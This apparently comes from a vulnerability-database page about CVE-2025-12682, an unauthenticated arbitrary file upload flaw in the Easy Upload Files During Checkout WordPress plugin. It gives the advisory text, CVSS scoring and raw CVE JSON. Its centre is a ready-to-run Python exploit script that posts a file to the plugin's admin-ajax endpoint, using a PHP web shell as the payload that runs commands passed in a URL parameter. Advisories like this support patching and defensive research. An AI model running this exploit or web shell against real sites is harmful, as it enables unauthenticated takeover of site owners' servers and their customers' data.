Security Vulnerability Report
中文
CVE-2025-12682 CVSS 9.8 CRITICAL

CVE-2025-12682

Published: 2025-11-04 14:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Easy Upload Files During Checkout plugin for WordPress is vulnerable to arbitrary JavaScript file uploads due to missing file type validation in the 'file_during_checkout' function in all versions up to, and including, 2.9.8. This makes it possible for unauthenticated attackers to upload arbitrary JavaScript files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Easy Upload Files During Checkout <= 2.9.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12682 PoC - Arbitrary JavaScript File Upload # Target: Easy Upload Files During Checkout WordPress Plugin <= 2.9.8 def exploit_upload(target_url, js_payload): """ Exploit arbitrary file upload vulnerability in Easy Upload Files During Checkout plugin """ upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php" files = { 'file': ( 'malicious.js', js_payload, 'application/javascript' ) } data = { 'action': 'file_during_checkout', 'order_id': '1' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Attempting to upload malicious JavaScript file to {target_url}") try: response = requests.post( upload_endpoint, files=files, data=data, headers=headers, timeout=10 ) if response.status_code == 200: print("[+] File upload request sent successfully") print(f"[*] Response: {response.text}") print("[*] Check if malicious.js is accessible at upload directory") return True else: print(f"[-] Upload failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") sys.exit(1) target = sys.argv[1].rstrip('/') # Malicious JavaScript payload for RCE attempt js_payload = """<?php // If attacker can trigger PHP execution through the JS file system($_GET['cmd']); ?>""" exploit_upload(target, js_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12682", "sourceIdentifier": "[email protected]", "published": "2025-11-04T14:15:33.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy Upload Files During Checkout plugin for WordPress is vulnerable to arbitrary JavaScript file uploads due to missing file type validation in the 'file_during_checkout' function in all versions up to, and including, 2.9.8. This makes it possible for unauthenticated attackers to upload arbitrary JavaScript files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3384711/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6a050764-0ba6-49a4-bd71-f79e3129fc4c?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.